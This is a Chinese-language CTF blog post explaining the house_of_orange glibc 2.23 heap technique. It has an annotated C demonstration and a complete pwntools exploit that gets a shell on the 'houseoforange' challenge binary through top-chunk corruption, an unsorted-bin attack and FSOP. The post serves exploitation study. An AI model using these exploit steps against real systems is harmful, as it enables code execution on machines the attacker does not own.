<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","scheme":"Gemini","version":"7.7.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":false,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="how2heap - house_of_orange&amp;houseoforangeubuntu16.04   libc2.23 house_of_orange.c1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859#includ">
<meta property="og:type" content="article">
<meta property="og:title" content="how2heap - house_of_orange&amp;houseoforange">
<meta property="og:url" content="http://yoursite.com/2020/03/15/how2heap-house-of-orange-houseoforange/index.html">
<meta property="og:site_name" content="Coldshield&#39;s blog">
<meta property="og:description" content="how2heap - house_of_orange&amp;houseoforangeubuntu16.04   libc2.23 house_of_orange.c1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859#includ">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://yoursite.com/2020/03/15/how2heap-house-of-orange-houseoforange/1584105896359.png">
<meta property="og:image" content="http://yoursite.com/2020/03/15/how2heap-house-of-orange-houseoforange/1584105957540.png">
<meta property="og:image" content="http://yoursite.com/2020/03/15/how2heap-house-of-orange-houseoforange/1584106502771.png">
<meta property="og:image" content="http://yoursite.com/2020/03/15/how2heap-house-of-orange-houseoforange/1584106661589.png">
<meta property="article:published_time" content="2020-03-14T19:05:12.000Z">
<meta property="article:modified_time" content="2020-03-15T10:06:01.960Z">
<meta property="article:author" content="Coldshield">
<meta property="article:tag" content="how2heap">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2020/03/15/how2heap-house-of-orange-houseoforange/1584105896359.png">

<link rel="canonical" href="http://yoursite.com/2020/03/15/how2heap-house-of-orange-houseoforange/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true
  };
</script>

  <title>how2heap - house_of_orange&houseoforange | Coldshield's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Coldshield's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
        <p class="site-subtitle">Mostly PWN & RE</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>About</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>Archives</a>

  </li>
        <li class="menu-item menu-item-links">

    <a href="/links/" rel="section"><i class="fa fa-fw fa-link"></i>友链</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/03/15/how2heap-house-of-orange-houseoforange/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Coldshield">
      <meta itemprop="description" content="分享一些bin学习日常">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Coldshield's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          how2heap - house_of_orange&houseoforange
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2020-03-15 03:05:12 / Modified: 18:06:01" itemprop="dateCreated datePublished" datetime="2020-03-15T03:05:12+08:00">2020-03-15</time>
            </span>

          
            <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
      <span class="post-meta-item-text">Valine: </span>
    
    <a title="valine" href="/2020/03/15/how2heap-house-of-orange-houseoforange/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2020/03/15/how2heap-house-of-orange-houseoforange/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="how2heap-house-of-orange-amp-houseoforange"><a href="#how2heap-house-of-orange-amp-houseoforange" class="headerlink" title="how2heap - house_of_orange&amp;houseoforange"></a>how2heap - house_of_orange&amp;houseoforange</h1><p>ubuntu16.04   libc2.23</p>
<h1 id="house-of-orange-c"><a href="#house-of-orange-c" class="headerlink" title="house_of_orange.c"></a>house_of_orange.c</h1><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">winner</span> <span class="params">( <span class="keyword">char</span> *ptr)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">char</span> *p1, *p2;</span><br><span class="line">    <span class="keyword">size_t</span> io_list_all, *top;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    p1 = <span class="built_in">malloc</span>(<span class="number">0x400</span><span class="number">-0x10</span>);<span class="comment">//malloc一个small chunk (size:0x400)</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    top = (<span class="keyword">size_t</span> *) ( (<span class="keyword">char</span> *) p1 - <span class="number">16</span> + <span class="number">0x400</span>);<span class="comment">//top=&amp;top_chunk</span></span><br><span class="line">    top[<span class="number">1</span>] = <span class="number">0xc01</span>;<span class="comment">//top_chunk.size=0xc01 这里，topchunk+size后的地址必须是页对齐的，prev_inuse必须要设置</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    p2 = <span class="built_in">malloc</span>(<span class="number">0x1000</span>);<span class="comment">//malloc一个比top_chunk.size大的chunk，此时0xc01的旧top_chunk就会被放到	unsortedbin中去</span></span><br><span class="line"></span><br><span class="line">    io_list_all = top[<span class="number">2</span>] + <span class="number">0x9a8</span>;<span class="comment">//top的fd+0x9a8就等于io_list_all在libc中的地址</span></span><br><span class="line"></span><br><span class="line">    top[<span class="number">3</span>] = io_list_all - <span class="number">0x10</span>;<span class="comment">//把top的bk设置成io_list_all-0x10处，用于bck-&gt;fd = unsorted_chunks (av)这一任意写，此时写上去的正好是main_arena.top的地址(&amp;main_arena.top)</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">memcpy</span>( ( <span class="keyword">char</span> *) top, <span class="string">"/bin/sh\x00"</span>, <span class="number">8</span>);<span class="comment">// 将/bin/sh写到top_chunk上面</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    top[<span class="number">1</span>] = <span class="number">0x61</span>;<span class="comment">//在后面malloc(10)的时候，把chunk放到对应的chain处</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    _IO_FILE *fp = (_IO_FILE *) top;</span><br><span class="line">    <span class="comment">/////////////////////////////////////////////////////////////这里就是FSOP那一套</span></span><br><span class="line">    fp-&gt;_mode = <span class="number">0</span>; <span class="comment">// top+0xc0</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    fp-&gt;_IO_write_base = (<span class="keyword">char</span> *) <span class="number">2</span>; <span class="comment">// top+0x20</span></span><br><span class="line">    fp-&gt;_IO_write_ptr = (<span class="keyword">char</span> *) <span class="number">3</span>; <span class="comment">// top+0x28</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="keyword">size_t</span> *jump_table = &amp;top[<span class="number">12</span>]; <span class="comment">// controlled memory</span></span><br><span class="line">    jump_table[<span class="number">3</span>] = (<span class="keyword">size_t</span>) &amp;winner;</span><br><span class="line">    *(<span class="keyword">size_t</span> *) ((<span class="keyword">size_t</span>) fp + <span class="keyword">sizeof</span>(_IO_FILE)) = (<span class="keyword">size_t</span>) jump_table; <span class="comment">// top+0xd8</span></span><br><span class="line">	<span class="comment">///////////////////////////////////////////////////////////////////////////////</span></span><br><span class="line">    <span class="built_in">malloc</span>(<span class="number">10</span>);<span class="comment">//malloc(0x10),size不相等时触发任意写，并在任意写之后，由于unsortedbin-&gt;bk指向的是io_list_all-0x10，此处的对应的size为0，然后就会触发malloc_printerr</span></span><br><span class="line">    <span class="comment">//触发malloc_printerr就会触发_IO_flush_all_lockp，之后通过chain，FSOP成功(这里能通过chain劫持成功的原因也是因为main_arena上对应偏移处的_mode值不为0)</span></span><br><span class="line">    <span class="comment">//之后就会去执行我们的winner了，而且关键是IO_FILE对于函数的调用是类似于f(ptr)这样调用的，所以最后执行的时候就是_IO_OVERFLOW(fp, EOF)=&gt;system(&amp;top)</span></span><br><span class="line">    <span class="comment">//然而此时top上的字符串是/bin/sh，所以就会getshell</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">winner</span><span class="params">(<span class="keyword">char</span> *ptr)</span></span></span><br><span class="line"><span class="function"></span>&#123; </span><br><span class="line">    system(ptr);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>由于源how2heap上的代码注释太多，要是对具体有疑问的推荐去看一下源代码上的注释，我这个主要是总结用，还有以后参考用</p>
<p>整个过程是一个很巧妙的过程，没有通过free，就是通过top_chunk和unsortedbin attack实现了这个利用，全程也不是特别难理解，我的调试过程就是看了一下到底是哪出错调用的malloc_printerr</p>
<h1 id="houseoforange"><a href="#houseoforange" class="headerlink" title="houseoforange"></a>houseoforange</h1><h2 id="程序分析"><a href="#程序分析" class="headerlink" title="程序分析"></a>程序分析</h2><h3 id="build"><a href="#build" class="headerlink" title="build"></a>build</h3><p><img src="/2020/03/15/how2heap-house-of-orange-houseoforange/1584105896359.png" alt="1584105896359"></p>
<p>最多只能build 4次，对应的chunk联系如下图所示</p>
<p><img src="/2020/03/15/how2heap-house-of-orange-houseoforange/1584105957540.png" alt="1584105957540"></p>
<p>其中Orange和price_color_chunk都是固定大小的，而且price_color_chunk是calloc出来的chunk</p>
<p>name是我们自己控制大小的一个chunk，最大可为0x1000</p>
<h3 id="see"><a href="#see" class="headerlink" title="see"></a>see</h3><p><img src="/2020/03/15/how2heap-house-of-orange-houseoforange/1584106502771.png" alt="1584106502771"></p>
<p>基本就是打印我们的name还有price，加上一个我们指定颜色的橘子</p>
<h3 id="upgrade"><a href="#upgrade" class="headerlink" title="upgrade"></a>upgrade</h3><p><img src="/2020/03/15/how2heap-house-of-orange-houseoforange/1584106661589.png" alt="1584106661589"></p>
<p>最多只允许upgrade两次，其中更新时的lenth是我们自己输出的，存在一个溢出，然后就是更新price和color</p>
<h2 id="漏洞分析-amp-Exploit"><a href="#漏洞分析-amp-Exploit" class="headerlink" title="漏洞分析&amp;Exploit"></a>漏洞分析&amp;Exploit</h2><p>漏洞点应该说很容易理解，就是upgrade中的overflow，主要就在于我们应该怎么利用。首先程序没有free，所以很多利用都没办法下手了，但是前面刚好学到了<code>house_of_orange</code>，是一个不需要用free即可实现的漏洞，再来看</p>
<p>build中的chunk申请顺序是：<code>malloc(0x10);malloc(len);calloc(8)</code></p>
<p>然后我们的溢出产生在第二个chunk上，可以溢出到calloc出来的chunk还有topchunk</p>
<p>所以这里先build一个house来修改topchunk的size，和前面<code>house_of_orange.c</code>中一样，设置时保持top+size+0x20页对齐，用于后续利用</p>
<p>设置好之后build第二个house，此时指定name为0x1000大小，即可把原来的topchunk放到unsortedbin</p>
<p>这个时候再进行第三次build，指定name稍微小一点，保证这次build出来的house都是从top中切出来的，然后就可以进行溢出修改、leak的操作了</p>
<p>最后一次build触发FSOP即可……..?是不是还少了点什么，因为我们FSOP的时候需要吧vtable指向一个我们可以控制的地方，但是我还没有leak heap或者PIE啊….这怎么办，后来再查阅wp的时候知道了通过切割largechunk时残留的fd_nextsize和bk_nextsize leak的操作….说实话因为largebin在写题的时候用到的少所以没有想到XD…记下来免得以后不记得</p>
<p>PS：顺带记一下<code>fd_nextsize</code>和<code>bk_nextsize</code>会被清空的情况</p>
<ol>
<li>从unsortedbin中唯一last remainder中切出来的时候(malloc.c:3494)</li>
<li>从largebin中切割出的remainder放入unsortedbin时，如果remainder的size仍是属于largebin的，就将这两个ptr清空<br>(malloc.c:3645)（我们最后堆地址泄露就是通过从这切出来的large victim chunk）</li>
<li>一个属于largesize的chunk，free被链入unsortedbin时</li>
</ol>
<h2 id="完整EXP"><a href="#完整EXP" class="headerlink" title="完整EXP"></a>完整EXP</h2><p>有了上面思路之后写WP就很好说了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> __future__ <span class="keyword">import</span> print_function</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">binary = <span class="string">'./houseoforange'</span>	<span class="comment">#binary's name here</span></span><br><span class="line">context.binary = binary		<span class="comment">#context here</span></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">pty = process.PTY</span><br><span class="line">p = process(binary, aslr = <span class="number">1</span>, stdin=pty, stdout=pty)	<span class="comment">#process option here</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">Host =</span></span><br><span class="line"><span class="string">Port =</span></span><br><span class="line"><span class="string">p = remote(Host,Port)</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">elf = ELF(binary)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">my_u64 = <span class="keyword">lambda</span> x: u64(x.ljust(<span class="number">8</span>, <span class="string">'\x00'</span>))</span><br><span class="line">my_u32 = <span class="keyword">lambda</span> x: u32(x.ljust(<span class="number">4</span>, <span class="string">'\x00'</span>))</span><br><span class="line">global_max_fast=<span class="number">0x3c67f8</span></span><br><span class="line">codebase = <span class="number">0x555555554000</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">loginfo</span><span class="params">(what=<span class="string">''</span>,address=<span class="number">0</span>)</span>:</span></span><br><span class="line">	log.info(<span class="string">"\033[1;36m"</span> + what + <span class="string">'-----&gt;'</span> + hex(address) + <span class="string">"\033[0m"</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># todo here</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">build</span><span class="params">(length,name,price,color)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice : '</span>)</span><br><span class="line">	p.send(<span class="string">'1'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'of name :'</span>)</span><br><span class="line">	p.send(str(length))</span><br><span class="line">	p.recvuntil(<span class="string">'Name :'</span>)</span><br><span class="line">	p.send(name)</span><br><span class="line">	p.recvuntil(<span class="string">'Price of Orange:'</span>)</span><br><span class="line">	p.send(str(price))</span><br><span class="line">	p.recvuntil(<span class="string">'Color of Orange:'</span>)</span><br><span class="line">	p.send(str(color))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">upgrade</span><span class="params">(length,name,price,color)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice : '</span>)</span><br><span class="line">	p.send(<span class="string">'3'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'of name :'</span>)</span><br><span class="line">	p.send(str(length))</span><br><span class="line">	p.recvuntil(<span class="string">'Name:'</span>)</span><br><span class="line">	p.send(name)</span><br><span class="line">	p.recvuntil(<span class="string">'Price of Orange:'</span>)</span><br><span class="line">	p.send(str(price))</span><br><span class="line">	p.recvuntil(<span class="string">'Color of Orange:'</span>)</span><br><span class="line">	p.send(str(color))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">see</span><span class="params">()</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice : '</span>)</span><br><span class="line">	p.send(<span class="string">'2'</span>)</span><br><span class="line"></span><br><span class="line">build(<span class="number">0x10</span>,<span class="string">'a'</span>*<span class="number">0x10</span>,<span class="number">1</span>,<span class="number">0xDDAA</span>)<span class="comment">#0x20 0x20 0x20 0x20fa1</span></span><br><span class="line">payload=<span class="string">'a'</span>*<span class="number">0x18</span>+p64(<span class="number">0x21</span>)+p64(<span class="number">0xddaa00000001</span>)+p64(<span class="number">0</span>)*<span class="number">2</span>+p64(<span class="number">0xfa1</span>)</span><br><span class="line">upgrade(<span class="number">0x40</span>,payload,<span class="number">1</span>,<span class="number">0xDDAA</span>)</span><br><span class="line">build(<span class="number">0x1000</span>,<span class="string">'\x00'</span>*<span class="number">0x1000</span>,<span class="number">1</span>,<span class="number">0xDDAA</span>)</span><br><span class="line">build(<span class="number">0x400</span>,<span class="string">'*'</span>*<span class="number">0x8</span>,<span class="number">1</span>,<span class="number">0xDDAA</span>)<span class="comment">#when the size is largesize, the split victim chunk will remain the fd_nextsize&amp;bk_nextsize</span></span><br><span class="line"></span><br><span class="line">see()</span><br><span class="line">p.recvuntil(<span class="string">"********"</span>)</span><br><span class="line">libc_base=my_u64(p.recv(<span class="number">6</span>))<span class="number">-0x3c5188</span></span><br><span class="line">loginfo(<span class="string">"libc_base:"</span>,libc_base)</span><br><span class="line"></span><br><span class="line">upgrade(<span class="number">0x10</span>,<span class="string">'*'</span>*<span class="number">0x10</span>,<span class="number">1</span>,<span class="number">0xDDAA</span>)</span><br><span class="line">see()</span><br><span class="line">p.recvuntil(<span class="string">'****************'</span>)</span><br><span class="line">heap_base=my_u64(p.recv(<span class="number">6</span>))<span class="number">-0xc0</span></span><br><span class="line">loginfo(<span class="string">"heap_base"</span>,heap_base)</span><br><span class="line"></span><br><span class="line">payload=<span class="string">'\x00'</span>*<span class="number">0x408</span>+p64(<span class="number">0x21</span>)+p64(<span class="number">0xddaa00000010</span>)+p64(<span class="number">0</span>)+<span class="string">'/bin/sh\x00'</span>+p64(<span class="number">0x61</span>)+p64(<span class="number">0</span>)+p64(libc_base+<span class="number">0x3c5520</span><span class="number">-0x10</span>)</span><br><span class="line">payload+=(p64(<span class="number">0</span>)+p64(<span class="number">1</span>)).ljust(<span class="number">0xb0</span>,<span class="string">'\x00'</span>)+p64(<span class="number">0</span>)</span><br><span class="line">payload=payload.ljust(<span class="number">0xc8</span>,<span class="string">'\x00'</span>)+p64(heap_base+<span class="number">0x5c0</span>)+p64(<span class="number">0</span>)+p64(libc.symbols[<span class="string">'system'</span>]+libc_base)</span><br><span class="line"></span><br><span class="line">upgrade(len(payload),payload,<span class="number">1</span>,<span class="number">0xDDAA</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'Your choice : '</span>)</span><br><span class="line">p.send(<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"><span class="string">'''libc 2.23 x64</span></span><br><span class="line"><span class="string">0x45216 execve("/bin/sh", rsp+0x30, environ)constraints:  rax == NULL</span></span><br><span class="line"><span class="string">0x4526a execve("/bin/sh", rsp+0x30, environ)constraints:  [rsp+0x30] == NULL</span></span><br><span class="line"><span class="string">0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints:  [rsp+0x50] == NULL</span></span><br><span class="line"><span class="string">0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints:  [rsp+0x70] == NULL</span></span><br><span class="line"><span class="string">req = dest - old_top - 4*sizeof(long)</span></span><br><span class="line"><span class="string">fastbin addree to size： (offset_to_fastbinY/8+2)&lt;&lt;(4 or 3)</span></span><br><span class="line"><span class="string">largebin chunksize:0x410|0x450|0x490|0x4C0...</span></span><br><span class="line"><span class="string">'''</span></span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/how2heap/" rel="tag"># how2heap</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/03/05/how2heap-house-of-einherjar-tinypad/" rel="prev" title="how2heap - house_of_einherjar&tinypad">
      <i class="fa fa-chevron-left"></i> how2heap - house_of_einherjar&tinypad
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/03/23/kernel%E5%85%A5%E9%97%A8/" rel="next" title="kernel入门">
      kernel入门 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
